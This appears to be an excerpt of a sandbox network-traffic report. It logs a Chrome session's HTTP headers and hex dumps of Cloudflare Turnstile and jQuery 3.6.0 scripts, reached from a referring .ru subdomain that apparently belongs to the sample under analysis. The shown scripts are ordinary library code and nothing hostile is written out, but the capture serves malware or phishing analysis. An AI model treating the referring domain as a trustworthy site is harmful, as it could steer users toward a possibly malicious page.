                                                                              Referer: https://7x7.jaaqwamco.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:42 UTC471INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:42 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 47695
                                                                              Connection: close
                                                                              accept-ranges: bytes
                                                                              last-modified: Thu, 21 Nov 2024 17:58:42 GMT
                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                              access-control-allow-origin: *
                                                                              cross-origin-resource-policy: cross-origin
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e8db883f5f8-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:42 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                              Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                              Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                              Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                              Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                              Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42
                                                                              Data Ascii: av0/rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUB
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 63 74 7c 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72
                                                                              Data Ascii: ct||Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 73 2c 6e 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28
                                                                              Data Ascii: s,n);var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74
                                                                              Data Ascii: cument.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.st


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.1649737151.101.2.1374436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:42 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                              Host: code.jquery.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:42 UTC613INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 89501
                                                                              Server: nginx
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                              ETag: "28feccc0-15d9d"
                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                              Accept-Ranges: bytes
                                                                              Age: 2632958
                                                                              Date: Tue, 26 Nov 2024 19:54:42 GMT
                                                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740042-EWR
                                                                              X-Cache: HIT, HIT
                                                                              X-Cache-Hits: 5889, 0
                                                                              X-Timer: S1732650883.782716,VS0,VE1
                                                                              Vary: Accept-Encoding
                                                                              2024-11-26 19:54:42 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                              2024-11-26 19:54:42 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                              Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                              2024-11-26 19:54:42 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                              2024-11-26 19:54:42 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                              2024-11-26 19:54:42 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                              2024-11-26 19:54:42 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                              2024-11-26 19:54:42 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                              2024-11-26 19:54:42 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
